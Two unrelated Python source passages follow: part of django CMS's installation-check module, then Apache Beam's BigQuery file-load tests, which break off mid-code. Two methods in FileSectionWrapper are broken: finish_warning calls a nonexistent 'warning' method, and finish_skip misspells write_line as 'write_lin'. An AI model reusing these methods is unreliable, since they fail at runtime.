Wraps two file-like objects (that support at the very least the 'write'
method) into an API to be used by the check function further down in
this module.
The following properties are public (and required) by alternative implementations:
errors: integer count of errors encountered
successes: integer count of successes encountered
warnings: integer count of warnings encountered
skips: integer count of skips encountered
successful: Whether the checks were successful (no errors)
They must also provide these methods:
write_line(message=''): writes a message to stdout
write_stderr_line(message=''): writes a message to stderr
success(message): reports and registers a successful check
error(message): reports and registers an error
warn(message); reports and registers a warning
skip(message): reports and registers a skipped check
section(title): A context manager that starts a new section. For the
Section API see FileSectionWrapper
"""
def __init__(self, stdout, stderr):
self.stdout = stdout
self.stderr = stderr
self.section_wrapper = FileSectionWrapper
self.errors = 0
self.successes = 0
self.warnings = 0
self.skips = 0
def colorize(self, msg, opts=(), **kwargs):
return colorize(msg, opts=opts, **kwargs)
def write_line(self, message=''):
self.write(u'%s\n' % message)
def write(self, message):
self.stdout.write(message)
def write_stderr_line(self, message=''):
self.write_stderr(u'%s\n' % message)
def write_stderr(self, message):
self.stderr.write(message)
def success(self, message):
self.successes += 1
self.write_line(u'%s %s' % (message, self.colorize('[OK]', fg='green', opts=['bold'])))
def error(self, message):
self.errors += 1
self.write_stderr_line(u'%s %s' % (message, self.colorize('[ERROR]', fg='red', opts=['bold'])))
def warn(self, message):
self.warnings += 1
self.write_stderr_line(u'%s %s' % (message, self.colorize('[WARNING]', fg='yellow', opts=['bold'])))
def skip(self, message):
self.skips += 1
self.write_line(u'%s %s' % (message, self.colorize('[SKIP]', fg='blue', opts=['bold'])))
@method_decorator(contextmanager)
def section(self, title):
self.write_line(self.colorize(title, opts=['bold']))
self.write_line(self.colorize('=' * len(title), opts=['bold']))
self.write_line()
wrapper = self.section_wrapper(self)
try:
yield wrapper
except:
self.error('Checker failed, see traceback')
raise
self.errors += wrapper.errors
self.successes += wrapper.successes
self.warnings += wrapper.warnings
self.skips += wrapper.skips
self.write_line('')
@property
def successful(self):
return not self.errors
class FileSectionWrapper(FileOutputWrapper):
"""
Used from FileOutputWrapper to report checks in a section.
If you want to provide your own output class, you may want to subclass
this class for the section reporting too. If you want to use your own,
you must defined at least the same API as FileOutputWrapper, as well
as these four additional methods:
finish_success(message): End the section (successfully)
finish_error(message): End the section with errors
finish_warning(message): End this section with a warning
finish_skip(message): End this (skipped) section
"""
def __init__(self, wrapper):
super(FileSectionWrapper, self).__init__(wrapper.stdout, wrapper.stderr)
self.wrapper = wrapper
def write_line(self, message=''):
self.write(u' - %s\n' % message)
def write_stderr_line(self, message=''):
self.write_stderr(u' - %s\n' % message)
def finish_success(self, message):
self.wrapper.write_line()
self.wrapper.success(message)
def finish_error(self, message):
self.wrapper.write_line()
self.wrapper.error(message)
def finish_warning(self, message):
self.wrapper.write_line()
self.wrapper.warning(message)
def finish_skip(self, message):
self.wrapper.write_lin()
self.wrapper.skip(message)
def define_check(func):
"""
Helper decorator to register a check function.
"""
CHECKERS.append(func)
return func
@define_check
def check_sekizai(output):
with output.section("Sekizai") as section:
if 'sekizai' in settings.INSTALLED_APPS:
section.success("Sekizai is installed")
else:
section.error("Sekizai is not installed, could not find 'sekizai' in INSTALLED_APPS")
if 'sekizai.context_processors.sekizai' in settings.TEMPLATE_CONTEXT_PROCESSORS:
section.success("Sekizai template context processor is installed")
else:
section.error("Sekizai template context processor is not installed, could not find 'sekizai.context_processors.sekizai' in TEMPLATE_CONTEXT_PROCESSORS")
for template, _ in get_cms_setting('TEMPLATES'):
if template == constants.TEMPLATE_INHERITANCE_MAGIC:
continue
if validate_template(template, ['js', 'css']):
section.success("Sekizai namespaces 'js' and 'css' found in %r" % template)
else:
section.error("Sekizai namespaces 'js' and 'css' not found in %r" % template)
if section.successful:
section.finish_success("Sekizai configuration okay")
else:
section.finish_error("Sekizai configuration has errors")
@define_check
def check_i18n(output):
with output.section("Internationalization") as section:
if isinstance(getattr(settings, 'CMS_LANGUAGES', {}), dict):
section.success("New style CMS_LANGUAGES")
else:
section.warn("Old style (tuple based) CMS_LANGUAGES, please switch to the new (dictionary based) style")
if getattr(settings, 'LANGUAGE_CODE', '').find('_') > -1:
section.warn("LANGUAGE_CODE must contain a valid language code, not a locale (e.g.: 'en-us' instead of 'en_US'): '%s' provided" % getattr(settings, 'LANGUAGE_CODE', ''))
for lang in getattr(settings, 'LANGUAGES', ()):
if lang[0].find('_') > -1:
section.warn("LANGUAGES must contain valid language codes, not locales (e.g.: 'en-us' instead of 'en_US'): '%s' provided" % lang[0])
if isinstance(settings.SITE_ID, int):
for site, items in get_cms_setting('LANGUAGES').items():
if type(site) == int:
for lang in items:
if lang['code'].find('_') > -1:
section.warn("CMS_LANGUAGES entries must contain valid language codes, not locales (e.g.: 'en-us' instead of 'en_US'): '%s' provided" % lang['code'])
else:
section.error("SITE_ID must be an integer, not %r" % settings.SITE_ID)
for deprecated in ['CMS_HIDE_UNTRANSLATED', 'CMS_LANGUAGE_FALLBACK', 'CMS_LANGUAGE_CONF', 'CMS_SITE_LANGUAGES', 'CMS_FRONTEND_LANGUAGES']:
if hasattr(settings, deprecated):
section.warn("Deprecated setting %s found. This setting is now handled in the new style CMS_LANGUAGES and can be removed" % deprecated)
@define_check
def check_deprecated_settings(output):
with output.section("Deprecated settings") as section:
found = False
for deprecated in ['CMS_FLAT_URLS', 'CMS_MODERATOR']:
if hasattr(settings, deprecated):
section.warn("Deprecated setting %s found. This setting is no longer in use and can be removed" % deprecated)
found = True
if not found:
section.skip("No deprecated settings found")
@define_check
def check_plugin_instances(output):
from cms.management.commands.subcommands.list import plugin_report
with output.section("Plugin instances") as section:
# get the report
report = plugin_report()
section.success("Plugin instances of %s types found in the database" % len(report))
# loop over plugin types in the report
for plugin_type in report:
# warn about those that are not installed
if not plugin_type["model"]:
section.error("%s has instances but is no longer installed" % plugin_type["type"] )
# warn about those that have unsaved instances
if plugin_type["unsaved_instances"]:
section.error("%s has %s unsaved instances" % (plugin_type["type"], len(plugin_type["unsaved_instances"])))
if section.successful:
section.finish_success("The plugins in your database are in good order")
else:
section.finish_error("There are potentially serious problems with the plugins in your database. \nEven if your site works, you should run the 'manage.py cms list plugins' \ncommand and then the 'manage.py cms delete_orphaned_plugins' command. \nThis will alter your database; read the documentation before using it.")
@define_check
def check_copy_relations(output):
from cms.plugin_pool import plugin_pool
from cms.extensions import extension_pool
from cms.extensions.models import BaseExtension
from cms.models.pluginmodel import CMSPlugin
c_to_s = lambda klass: '%s.%s' % (klass.__module__, klass.__name__)
def get_class(method_name, model):
for cls in inspect.getmro(model):
if method_name in cls.__dict__:
return cls
return None
with output.section('Presence of "copy_relations"') as section:
plugin_pool.discover_plugins()
for plugin in plugin_pool.plugins.values():
plugin_class = plugin.model
if get_class('copy_relations', plugin_class) is not CMSPlugin or plugin_class is CMSPlugin:
# this class defines a ``copy_relations`` method, nothing more
# to do
continue
for rel in plugin_class._meta.many_to_many:
section.warn('%s has a many-to-many relation to %s,\n but no "copy_relations" method defined.' % (
c_to_s(plugin_class),
c_to_s(rel.model),
))
for rel in plugin_class._meta.get_all_related_objects():
if rel.model != CMSPlugin:
section.warn('%s has a foreign key from %s,\n but no "copy_relations" method defined.' % (
c_to_s(plugin_class),
c_to_s(rel.model),
))
for extension in chain(extension_pool.page_extensions, extension_pool.title_extensions):
if get_class('copy_relations', extension) is not BaseExtension:
# OK, looks like there is a 'copy_relations' defined in the
# extension... move along...
continue
for rel in extension._meta.many_to_many:
section.warn('%s has a many-to-many relation to %s,\n but no "copy_relations" method defined.' % (
c_to_s(extension),
c_to_s(rel.related.parent_model),
))
for rel in extension._meta.get_all_related_objects():
if rel.model != extension:
section.warn('%s has a foreign key from %s,\n but no "copy_relations" method defined.' % (
c_to_s(extension),
c_to_s(rel.model),
))
if not section.warnings:
section.finish_success('All plugins and page/title extensions have "copy_relations" method if needed.')
else:
section.finish_success('Some plugins or page/title extensions do not define a "copy_relations" method.\nThis might lead to data loss when publishing or copying plugins/extensions.\nSee https://django-cms.readthedocs.org/en/latest/extending_cms/custom_plugins.html#handling-relations or https://django-cms.readthedocs.org/en/latest/extending_cms/extending_page_title.html#handling-relations.')
def _load_all_templates(directory):
"""
Loads all templates in a directory (recursively) and yields tuples of
template tokens and template paths.
"""
if os.path.exists(directory):
for name in os.listdir(directory):
path = os.path.join(directory, name)
if os.path.isdir(path):
for template in _load_all_templates(path):
yield template
elif path.endswith('.html'):
with open(path, 'rb') as fobj:
source = fobj.read().decode(settings.FILE_CHARSET)
lexer = Lexer(source, path)
yield lexer.tokenize(), path
@define_check
def deprecations(output):
# deprecated placeholder_tags scan (1 in 3.1)
templates_dirs = list(getattr(settings, 'TEMPLATE_DIRS', []))
templates_dirs.extend(
[os.path.join(path, 'templates') for path in get_app_paths()]
)
with output.section('Usage of deprecated placeholder_tags') as section:
for template_dir in templates_dirs:
for tokens, path in _load_all_templates(template_dir):
for token in tokens:
if token.token_type == TOKEN_BLOCK:
bits = token.split_contents()
if bits[0] == 'load' and 'placeholder_tags' in bits:
section.warn(
'Usage of deprecated template tag library '
'placeholder tags in template %s' % path
)
def check(output):
"""
Checks the configuration/environment of this django CMS installation.
'output' should be an object that provides the same API as FileOutputWrapper.
Returns whether the configuration/environment are okay (has no errors)
"""
title = "Checking django CMS installation"
border = '*' * len(title)
output.write_line(output.colorize(border, opts=['bold']))
output.write_line(output.colorize(title, opts=['bold']))
output.write_line(output.colorize(border, opts=['bold']))
output.write_line()
for checker in CHECKERS:
checker(output)
output.write_line()
with output.section("OVERALL RESULTS"):
if output.errors:
output.write_stderr_line(output.colorize("%s errors!" % output.errors, opts=['bold'], fg='red'))
if output.warnings:
output.write_stderr_line(output.colorize("%s warnings!" % output.warnings, opts=['bold'], fg='yellow'))
if output.skips:
output.write_line(output.colorize("%s checks skipped!" % output.skips, opts=['bold'], fg='blue'))
output.write_line(output.colorize("%s checks successful!" % output.successes, opts=['bold'], fg='green'))
output.write_line()
if output.errors:
output.write_stderr_line(output.colorize('Please check the errors above', opts=['bold'], fg='red'))
elif output.warnings:
output.write_stderr_line(output.colorize('Installation okay, but please check warnings above', opts=['bold'], fg='yellow'))
else:
output.write_line(output.colorize('Installation okay', opts=['bold'], fg='green'))
return output.successful
| |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for BigQuery file loads utilities."""
# pytype: skip-file
from __future__ import absolute_import
import logging
import os
import random
import sys
import time
import unittest
import mock
from hamcrest.core import assert_that as hamcrest_assert
from hamcrest.core.core.allof import all_of
from hamcrest.core.core.is_ import is_
from nose.plugins.attrib import attr
from parameterized import param
from parameterized import parameterized
import apache_beam as beam
from apache_beam.io.filebasedsink_test import _TestCaseWithTempDirCleanUp
from apache_beam.io.gcp import bigquery_file_loads as bqfl
from apache_beam.io.gcp import bigquery
from apache_beam.io.gcp import bigquery_tools
from apache_beam.io.gcp.internal.clients import bigquery as bigquery_api
from apache_beam.io.gcp.tests.bigquery_matcher import BigqueryFullResultMatcher
from apache_beam.io.gcp.tests.bigquery_matcher import BigqueryFullResultStreamingMatcher
from apache_beam.runners.dataflow.test_dataflow_runner import TestDataflowRunner
from apache_beam.runners.runner import PipelineState
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.test_stream import TestStream
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.transforms import combiners
from apache_beam.typehints.typehints import Tuple
try:
from apitools.base.py.exceptions import HttpError
except ImportError:
raise unittest.SkipTest('GCP dependencies are not installed')
_LOGGER = logging.getLogger(__name__)
_DESTINATION_ELEMENT_PAIRS = [
# DESTINATION 1
('project1:dataset1.table1', {
'name': 'beam', 'language': 'py'
}),
('project1:dataset1.table1', {
'name': 'beam', 'language': 'java'
}),
('project1:dataset1.table1', {
'name': 'beam', 'language': 'go'
}),
('project1:dataset1.table1', {
'name': 'flink', 'language': 'java'
}),
('project1:dataset1.table1', {
'name': 'flink', 'language': 'scala'
}),
# DESTINATION 3
('project1:dataset1.table3', {
'name': 'spark', 'language': 'scala'
}),
# DESTINATION 1
('project1:dataset1.table1', {
'name': 'spark', 'language': 'py'
}),
('project1:dataset1.table1', {
'name': 'spark', 'language': 'scala'
}),
# DESTINATION 2
('project1:dataset1.table2', {
'name': 'beam', 'foundation': 'apache'
}),
('project1:dataset1.table2', {
'name': 'flink', 'foundation': 'apache'
}),
('project1:dataset1.table2', {
'name': 'spark', 'foundation': 'apache'
}),
]
_DISTINCT_DESTINATIONS = list({elm[0] for elm in _DESTINATION_ELEMENT_PAIRS})
_ELEMENTS = [elm[1] for elm in _DESTINATION_ELEMENT_PAIRS]
_ELEMENTS_SCHEMA = bigquery.WriteToBigQuery.get_dict_table_schema(
bigquery_api.TableSchema(
fields=[
bigquery_api.TableFieldSchema(
name="name", type="STRING", mode="REQUIRED"),
bigquery_api.TableFieldSchema(name="language", type="STRING"),
bigquery_api.TableFieldSchema(name="foundation", type="STRING"),
]))
class TestWriteRecordsToFile(_TestCaseWithTempDirCleanUp):
maxDiff = None
def _consume_input(self, fn, checks=None):
if checks is None:
return
with TestPipeline() as p:
output_pcs = (
p
| beam.Create(_DESTINATION_ELEMENT_PAIRS, reshuffle=False)
| beam.ParDo(fn, self.tmpdir).with_outputs(
fn.WRITTEN_FILE_TAG, fn.UNWRITTEN_RECORD_TAG))
checks(output_pcs)
return output_pcs
@parameterized.expand([
param(file_format=bigquery_tools.FileFormat.AVRO),
param(file_format=bigquery_tools.FileFormat.JSON),
param(file_format=None),
])
def test_files_created(self, file_format):
"""Test that the files are created and written."""
fn = bqfl.WriteRecordsToFile(
schema=_ELEMENTS_SCHEMA, file_format=file_format)
self.tmpdir = self._new_tempdir()
def check_files_created(output_pcs):
dest_file_pc = output_pcs[bqfl.WriteRecordsToFile.WRITTEN_FILE_TAG]
files = dest_file_pc | "GetFiles" >> beam.Map(lambda x: x[1][0])
file_count = files | "CountFiles" >> combiners.Count.Globally()
_ = files | "FilesExist" >> beam.Map(
lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
assert_that(file_count, equal_to([3]), label='check file count')
destinations = (
dest_file_pc
| "GetDests" >>
beam.Map(lambda x: bigquery_tools.get_hashable_destination(x[0])))
assert_that(
destinations,
equal_to(list(_DISTINCT_DESTINATIONS)),
label='check destinations ')
self._consume_input(fn, check_files_created)
def test_many_files(self):
"""Forces records to be written to many files.
For each destination multiple files are necessary. This is because the max
file length is very small, so only a couple records fit in each file.
"""
fn = bqfl.WriteRecordsToFile(schema=_ELEMENTS_SCHEMA, max_file_size=50)
self.tmpdir = self._new_tempdir()
def check_many_files(output_pcs):
dest_file_pc = output_pcs[bqfl.WriteRecordsToFile.WRITTEN_FILE_TAG]
files_per_dest = (
dest_file_pc
| beam.Map(lambda x: x).with_output_types(
beam.typehints.KV[str, Tuple[str, int]])
| combiners.Count.PerKey())
files_per_dest = (
files_per_dest
| "GetDests" >> beam.Map(
lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1])))
assert_that(
files_per_dest,
equal_to([('project1:dataset1.table1', 4),
('project1:dataset1.table2', 2),
('project1:dataset1.table3', 1)]))
# Check that the files exist
_ = dest_file_pc | beam.Map(lambda x: x[1][0]) | beam.Map(
lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
self._consume_input(fn, check_many_files)
@parameterized.expand([
param(file_format=bigquery_tools.FileFormat.AVRO),
param(file_format=bigquery_tools.FileFormat.JSON),
])
def test_records_are_spilled(self, file_format):
"""Forces records to be written to many files.
For each destination multiple files are necessary, and at most two files
can be created. This forces records to be spilled to the next stage of
processing.
"""
fn = bqfl.WriteRecordsToFile(
schema=_ELEMENTS_SCHEMA,
max_files_per_bundle=2,
file_format=file_format)
self.tmpdir = self._new_tempdir()
def check_many_files(output_pcs):
dest_file_pc = output_pcs[bqfl.WriteRecordsToFile.WRITTEN_FILE_TAG]
spilled_records_pc = output_pcs[
bqfl.WriteRecordsToFile.UNWRITTEN_RECORD_TAG]
spilled_records_count = (spilled_records_pc | combiners.Count.Globally())
assert_that(spilled_records_count, equal_to([3]), label='spilled count')
files_per_dest = (
dest_file_pc
| beam.Map(lambda x: x).with_output_types(
beam.typehints.KV[str, Tuple[str, int]])
| combiners.Count.PerKey())
files_per_dest = (
files_per_dest
| "GetDests" >> beam.Map(
lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1])))
# Only table1 and table3 get files. table2 records get spilled.
assert_that(
files_per_dest,
equal_to([('project1:dataset1.table1', 1),
('project1:dataset1.table3', 1)]),
label='file count')
# Check that the files exist
_ = dest_file_pc | beam.Map(lambda x: x[1][0]) | beam.Map(
lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
self._consume_input(fn, check_many_files)
class TestWriteGroupedRecordsToFile(_TestCaseWithTempDirCleanUp):
def _consume_input(self, fn, input, checks):
if checks is None:
return
with TestPipeline() as p:
res = (
p
| beam.Create(input)
| beam.GroupByKey()
| beam.ParDo(fn, self.tmpdir))
checks(res)
return res
@parameterized.expand([
param(file_format=bigquery_tools.FileFormat.AVRO),
param(file_format=bigquery_tools.FileFormat.JSON),
param(file_format=None),
])
def test_files_are_created(self, file_format):
"""Test that the files are created and written."""
fn = bqfl.WriteGroupedRecordsToFile(
schema=_ELEMENTS_SCHEMA, file_format=file_format)
self.tmpdir = self._new_tempdir()
def check_files_created(output_pc):
files = output_pc | "GetFiles" >> beam.Map(lambda x: x[1][0])
file_count = files | "CountFiles" >> combiners.Count.Globally()
_ = files | "FilesExist" >> beam.Map(
lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
assert_that(file_count, equal_to([3]), label='check file count')
destinations = (
output_pc
| "GetDests" >>
beam.Map(lambda x: bigquery_tools.get_hashable_destination(x[0])))
assert_that(
destinations,
equal_to(list(_DISTINCT_DESTINATIONS)),
label='check destinations ')
self._consume_input(fn, _DESTINATION_ELEMENT_PAIRS, check_files_created)
def test_multiple_files(self):
"""Forces records to be written to many files.
For each destination multiple files are necessary. This is because the max
file length is very small, so only a couple records fit in each file.
"""
fn = bqfl.WriteGroupedRecordsToFile(
schema=_ELEMENTS_SCHEMA, max_file_size=50)
self.tmpdir = self._new_tempdir()
def check_multiple_files(output_pc):
files_per_dest = output_pc | combiners.Count.PerKey()
files_per_dest = (
files_per_dest
| "GetDests" >> beam.Map(
lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1])))
assert_that(
files_per_dest,
equal_to([
('project1:dataset1.table1', 4),
('project1:dataset1.table2', 2),
('project1:dataset1.table3', 1),
]))
# Check that the files exist
_ = output_pc | beam.Map(lambda x: x[1][0]) | beam.Map(os.path.exists)
self._consume_input(fn, _DESTINATION_ELEMENT_PAIRS, check_multiple_files)
class TestPartitionFiles(unittest.TestCase):
_ELEMENTS = [(
'destination0', [('file0', 50), ('file1', 50), ('file2', 50),
('file3', 50)]),
('destination1', [('file0', 50), ('file1', 50)])]
def test_partition(self):
partition = bqfl.PartitionFiles.Partition(1000, 1)
self.assertEqual(partition.can_accept(50), True)
self.assertEqual(partition.can_accept(2000), False)
self.assertEqual(partition.can_accept(1000), True)
partition.add('file1', 50)
self.assertEqual(partition.files, ['file1'])
self.assertEqual(partition.size, 50)
self.assertEqual(partition.can_accept(50), False)
self.assertEqual(partition.can_accept(0), False)
def test_partition_files_dofn_file_split(self):
"""Force partitions to split based on max_files"""
multiple_partitions_result = [('destination0', ['file0', 'file1']),
('destination0', ['file2', 'file3'])]
single_partition_result = [('destination1', ['file0', 'file1'])]
with TestPipeline() as p:
destination_file_pairs = p | beam.Create(self._ELEMENTS, reshuffle=False)
partitioned_files = (
destination_file_pairs
| beam.ParDo(bqfl.PartitionFiles(1000, 2)).with_outputs(
bqfl.PartitionFiles.MULTIPLE_PARTITIONS_TAG,
bqfl.PartitionFiles.SINGLE_PARTITION_TAG))
multiple_partitions = partitioned_files[bqfl.PartitionFiles\
.MULTIPLE_PARTITIONS_TAG]
single_partition = partitioned_files[bqfl.PartitionFiles\
.SINGLE_PARTITION_TAG]
assert_that(
multiple_partitions,
equal_to(multiple_partitions_result),
label='CheckMultiplePartitions')
assert_that(
single_partition,
equal_to(single_partition_result),
label='CheckSinglePartition')
def test_partition_files_dofn_size_split(self):
"""Force partitions to split based on max_partition_size"""
multiple_partitions_result = [('destination0', ['file0', 'file1', 'file2']),
('destination0', ['file3'])]
single_partition_result = [('destination1', ['file0', 'file1'])]
with TestPipeline() as p:
destination_file_pairs = p | beam.Create(self._ELEMENTS, reshuffle=False)
partitioned_files = (
destination_file_pairs
| beam.ParDo(bqfl.PartitionFiles(150, 10)).with_outputs(
bqfl.PartitionFiles.MULTIPLE_PARTITIONS_TAG,
bqfl.PartitionFiles.SINGLE_PARTITION_TAG))
multiple_partitions = partitioned_files[bqfl.PartitionFiles\
.MULTIPLE_PARTITIONS_TAG]
single_partition = partitioned_files[bqfl.PartitionFiles\
.SINGLE_PARTITION_TAG]
assert_that(
multiple_partitions,
equal_to(multiple_partitions_result),
label='CheckMultiplePartitions')
assert_that(
single_partition,
equal_to(single_partition_result),
label='CheckSinglePartition')
class TestBigQueryFileLoads(_TestCaseWithTempDirCleanUp):
def test_records_traverse_transform_with_mocks(self):
destination = 'project1:dataset1.table1'
job_reference = bigquery_api.JobReference()
job_reference.projectId = 'project1'
job_reference.jobId = 'job_name1'
result_job = bigquery_api.Job()
result_job.jobReference = job_reference
mock_job = mock.Mock()
mock_job.status.state = 'DONE'
mock_job.status.errorResult = None
mock_job.jobReference = job_reference
bq_client = mock.Mock()
bq_client.jobs.Get.return_value = mock_job
bq_client.jobs.Insert.return_value = result_job
transform = bqfl.BigQueryBatchFileLoads(
destination,
custom_gcs_temp_location=self._new_tempdir(),
test_client=bq_client,
validate=False,
temp_file_format=bigquery_tools.FileFormat.JSON)
# Need to test this with the DirectRunner to avoid serializing mocks
with TestPipeline('DirectRunner') as p:
outputs = p | beam.Create(_ELEMENTS) | transform
dest_files = outputs[bqfl.BigQueryBatchFileLoads.DESTINATION_FILE_PAIRS]
dest_job = outputs[bqfl.BigQueryBatchFileLoads.DESTINATION_JOBID_PAIRS]
jobs = dest_job | "GetJobs" >> beam.Map(lambda x: x[1])
files = dest_files | "GetFiles" >> beam.Map(lambda x: x[1][0])
destinations = (
dest_files
| "GetDests" >> beam.Map(
lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1]))
| "GetUniques" >> combiners.Count.PerKey()
| "GetFinalDests" >> beam.Keys())
# All files exist
_ = (
files
| beam.Map(lambda x: hamcrest_assert(os.path.exists(x), is_(True))))
# One file per destination
assert_that(
files | combiners.Count.Globally(), equal_to([1]), label='CountFiles')
assert_that(
destinations, equal_to([destination]), label='CheckDestinations')
assert_that(jobs, equal_to([job_reference]), label='CheckJobs')
@unittest.skipIf(sys.version_info[0] == 2, 'Mock pickling problems in Py 2')
@mock.patch('time.sleep')
def test_wait_for_job_completion(self, sleep_mock):
job_references = [bigquery_api.JobReference(), bigquery_api.JobReference()]
job_references[0].projectId = 'project1'
job_references[0].jobId = 'jobId1'
job_references[1].projectId = 'project1'
job_references[1].jobId = 'jobId2'
job_1_waiting = mock.Mock()
job_1_waiting.status.state = 'RUNNING'
job_2_done = mock.Mock()
job_2_done.status.state = 'DONE'
job_2_done.status.errorResult = None
job_1_done = mock.Mock()
job_1_done.status.state = 'DONE'
job_1_done.status.errorResult = None
bq_client = mock.Mock()
bq_client.jobs.Get.side_effect = [
job_1_waiting, job_2_done, job_1_done, job_2_done
]
waiting_dofn = bqfl.WaitForBQJobs(bq_client)
dest_list = [(i, job) for i, job in enumerate(job_references)]
with TestPipeline('DirectRunner') as p:
references = beam.pvalue.AsList(p | 'job_ref' >> beam.Create(dest_list))
outputs = (p | beam.Create(['']) | beam.ParDo(waiting_dofn, references))
assert_that(outputs, equal_to(dest_list))
sleep_mock.assert_called_once()
@unittest.skipIf(sys.version_info[0] == 2, 'Mock pickling problems in Py 2')
@mock.patch('time.sleep')
def test_one_job_failed_after_waiting(self, sleep_mock):
job_references = [bigquery_api.JobReference(), bigquery_api.JobReference()]
job_references[0].projectId = 'project1'
job_references[0].jobId = 'jobId1'
job_references[1].projectId = 'project1'
job_references[1].jobId = 'jobId2'
job_1_waiting = mock.Mock()
job_1_waiting.status.state = 'RUNNING'
job_2_done = mock.Mock()
job_2_done.status.state = 'DONE'
job_2_done.status.errorResult = None
job_1_error = mock.Mock()
job_1_error.status.state = 'DONE'
job_1_error.status.errorResult = 'Some problems happened'
bq_client = mock.Mock()
bq_client.jobs.Get.side_effect = [
job_1_waiting, job_2_done, job_1_error, job_2_done
]
waiting_dofn = bqfl.WaitForBQJobs(bq_client)
dest_list = [(i, job) for i, job in enumerate(job_references)]
with self.assertRaises(Exception):
with TestPipeline('DirectRunner') as p:
references = beam.pvalue.AsList(p | 'job_ref' >> beam.Create(dest_list))
_ = (p | beam.Create(['']) | beam.ParDo(waiting_dofn, references))
sleep_mock.assert_called_once()
def test_multiple_partition_files(self):
destination = 'project1:dataset1.table1'
job_reference = bigquery_api.JobReference()
job_reference.projectId = 'project1'
job_reference.jobId = 'job_name1'
result_job = mock.Mock()
result_job.jobReference = job_reference
mock_job = mock.Mock()
mock_job.status.state = 'DONE'
mock_job.status.errorResult = None
mock_job.jobReference = job_reference
bq_client = mock.Mock()
bq_client.jobs.Get.return_value = mock_job
bq_client.jobs.Insert.return_value = result_job
bq_client.tables.Delete.return_value = None
with TestPipeline('DirectRunner') as p:
outputs = (
p
| beam.Create(_ELEMENTS, reshuffle=False)
| bqfl.BigQueryBatchFileLoads(
destination,
custom_gcs_temp_location=self._new_tempdir(),
test_client=bq_client,
validate=False,
temp_file_format=bigquery_tools.FileFormat.JSON,
max_file_size=45,
max_partition_size=80,
max_files_per_partition=2))
dest_files = outputs[bqfl.BigQueryBatchFileLoads.DESTINATION_FILE_PAIRS]
dest_load_jobs = outputs[
bqfl.BigQueryBatchFileLoads.DESTINATION_JOBID_PAIRS]
dest_copy_jobs = outputs[
bqfl.BigQueryBatchFileLoads.DESTINATION_COPY_JOBID_PAIRS]
load_jobs = dest_load_jobs | "GetLoadJobs" >> beam.Map(lambda x: x[1])
copy_jobs = dest_copy_jobs | "GetCopyJobs" >> beam.Map(lambda x: x[1])
files = dest_files | "GetFiles" >> beam.Map(lambda x: x[1][0])
destinations = (
dest_files
| "GetDests" >> beam.Map(
lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1]))
| "GetUniques" >> combiners.Count.PerKey()
| "GetFinalDests" >> beam.Keys())
# All files exist
_ = (
files
| beam.Map(lambda x: hamcrest_assert(os.path.exists(x), is_(True))))
# One file per destination
assert_that(
files | "CountFiles" >> combiners.Count.Globally(),
equal_to([6]),
label='CheckFileCount')
assert_that(
destinations, equal_to([destination]), label='CheckDestinations')
assert_that(
load_jobs | "CountLoadJobs" >> combiners.Count.Globally(),
equal_to([6]),
label='CheckLoadJobCount')
assert_that(
copy_jobs | "CountCopyJobs" >> combiners.Count.Globally(),
equal_to([6]),
label='CheckCopyJobCount')
class BigQueryFileLoadsIT(unittest.TestCase):
BIG_QUERY_DATASET_ID = 'python_bq_file_loads_'
BIG_QUERY_SCHEMA = (
'{"fields": [{"name": "name","type": "STRING"},'
'{"name": "language","type": "STRING"}]}')
BIG_QUERY_SCHEMA_2 = (
'{"fields": [{"name": "name","type": "STRING"},'
'{"name": "foundation","type": "STRING"}]}')
BIG_QUERY_STREAMING_SCHEMA = ({
'fields': [{
'name': 'Integr', 'type': 'INTEGER', 'mode': 'NULLABLE'
}]
})
def setUp(self):
self.test_pipeline = TestPipeline(is_integration_test=True)
self.runner_name = type(self.test_pipeline.runner).__name__
self.project = self.test_pipeline.get_option('project')
self.dataset_id = '%s%s%d' % (
self.BIG_QUERY_DATASET_ID,
str(int(time.time())),
random.randint(0, 10000))
self.bigquery_client = bigquery_tools.BigQueryWrapper()
self.bigquery_client.get_or_create_dataset(self.project, self.dataset_id)
self.output_table = "%s.output_table" % (self.dataset_id)
_LOGGER.info(
"Created dataset %s in project %s", self.dataset_id, self.project)
@attr('IT')
def test_multiple_destinations_transform(self):
output_table_1 = '%s%s' % (self.output_table, 1)
output_table_2 = '%s%s' % (self.output_table, 2)
output_table_3 = '%s%s' % (self.output_table, 3)
output_table_4 = '%s%s' % (self.output_table, 4)
schema1 = bigquery.WriteToBigQuery.get_dict_table_schema(
bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA))
schema2 = bigquery.WriteToBigQuery.get_dict_table_schema(
bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA_2))
schema_kv_pairs = [(output_table_1, schema1), (output_table_2, schema2),
(output_table_3, schema1), (output_table_4, schema2)]
pipeline_verifiers = [
BigqueryFullResultMatcher(
project=self.project,
query="SELECT name, language FROM %s" % output_table_1,
data=[(d['name'], d['language']) for d in _ELEMENTS
if 'language' in d]),
BigqueryFullResultMatcher(
project=self.project,
query="SELECT name, foundation FROM %s" % output_table_2,
data=[(d['name'], d['foundation']) for d in _ELEMENTS
if 'foundation' in d]),
BigqueryFullResultMatcher(
project=self.project,
query="SELECT name, language FROM %s" % output_table_3,
data=[(d['name'], d['language']) for d in _ELEMENTS
if 'language' in d]),
BigqueryFullResultMatcher(
project=self.project,
